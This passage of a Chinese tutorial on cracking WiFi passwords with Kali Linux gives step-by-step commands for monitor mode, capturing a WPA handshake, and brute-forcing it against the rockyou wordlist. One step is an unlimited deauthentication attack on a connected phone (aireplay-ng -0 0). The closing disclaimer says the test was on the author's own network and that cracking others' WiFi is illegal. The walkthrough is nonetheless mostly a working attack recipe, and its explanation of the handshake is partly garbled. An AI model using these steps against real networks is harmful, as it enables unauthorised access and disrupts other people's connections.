最详细记录kali破解wifi过程
终端继续输入airmon-ng start wlan0
开启网卡监听模式
五:查看网卡信息
输入iwconfig
命令查看网卡信息,如果wlan0网卡名称加上了mon则表示成功
这里不得不提一下ifconfig
与iwconfig
的区别以及iwlist
命令
ifconfig
:这是开发板上的一块物理网卡和一个wifi模块,可以看到ip信息、网卡地址等等。这个命令还常用于设置网络信息。
例如:ifconfig eth0 192.168.1.100
//设置eth0接口ip为192.168.1.100
iwconfig
:配置无线网络接口,iwconfig
与ifconfig
命令相似,但是iwconfig
仅仅和无线网络相关,用来设置参数等。
iwlist
:从无线网卡获取更详细的无线信息,用于显示关于无线网络的额外信息,这些信息往往都是iwconfig
没有显示出来的。
六:扫描附近wifi网络
输入命令airodump-ng wlan0mon
开始扫描wifi,按ctrl+c
可以随时结束任务
扫描结果会有相应的分类:
- BSSID:代表为MAC地址
- PWR:为信号强弱的程度,数值越小信号越强
- DATA:为数据量,越大代表使用的人越多
- CH:为信道频率(频道)
- ESSID:为WiFi的名称(中文有可能会乱码)
七:根据信道频率抓包,以及抓包结果存储路径
输入命令airodump-ng --bssid BSSID的值 -c 信道频率 -w 抓包存储路径 wlan0mon
如:airodump-ng --bssid 20:65:8E:0F:E9:C0 -c 11 -w /home/wifi wlan0mon
此时数据包正在抓取,如果这是抓不到数据,我们需要在打开一个终端,输入airepaly-ng -0 0 -c 连接到此wifi的手机MAC地址 -a bssid 网卡名(一般为wlan0mon)
如:aireplay-ng -0 0 -c B0:55:08:A0:64:BA -a 8C:AB:8E:6E:85:F4 wlan0mon
这里的0代表wifi设备的无限次数。-0 5则攻击5次
攻击原理:先让我们攻击的对象设备掉线,然后设备会自动链接,并发这个自动链接过程会进行三次握手发送tco包(里面包含了加密的密码数据)
我们将伪装成wifi热点去窃取该数据包,窃取到的数据包可以用字典穷举暴力破解加密的wifi密码。数据包中的密码是哈希值加密,哈希值只能正向
当抓取数据包的终端中出现WAP handshake 则便是抓包成功
该数据包与上午抓取,因为抓取数据包太慢所以用现成的截图了
抓住到了数据包以后记得两个终端都要按ctrl+c
停止,否则被攻击方会一直断网
成功抓到数据包以后,进入home文件家输入ls
查看我们抓到的数据包
八:解压kali自带的字典文件
首先要解压kali自带的字典文件,路径为:/usr/share/wordlists/rockyou.txt.gz
加压命令:gzip -d /usr/share/wordlists/rockyou.txt.gz
九:破解该WiFi
指定字典路径,数据包路径开始破解WiFi,命令如下:
aircrack-ng -w /usr/share/wordlists/rockyou.txt
上图中提示”KEY NOT FOUND“代表没有破解成功
破解成功样式为:Current passphrase:密码
十:总结
测试WiFi为小编自家wifi,密码强度一般般吧,其实暴力破解并不简单,需要强大的字典和时间,所以可以生成属于自己的字典,字典越是强大越是容易破解。
破解他人WiFi涉嫌侵犯了网络所有人的个人财产,属于违法行为,情节严重者有可能追求刑事责任。
由于网络的所有权归购买人所有,如果通过技术手段来采取盗用,已经侵犯了所有人的个人财产。
本文仅供渗透测试使用,请勿用来非法操作。个人所产生的违反行为与本文小编无关!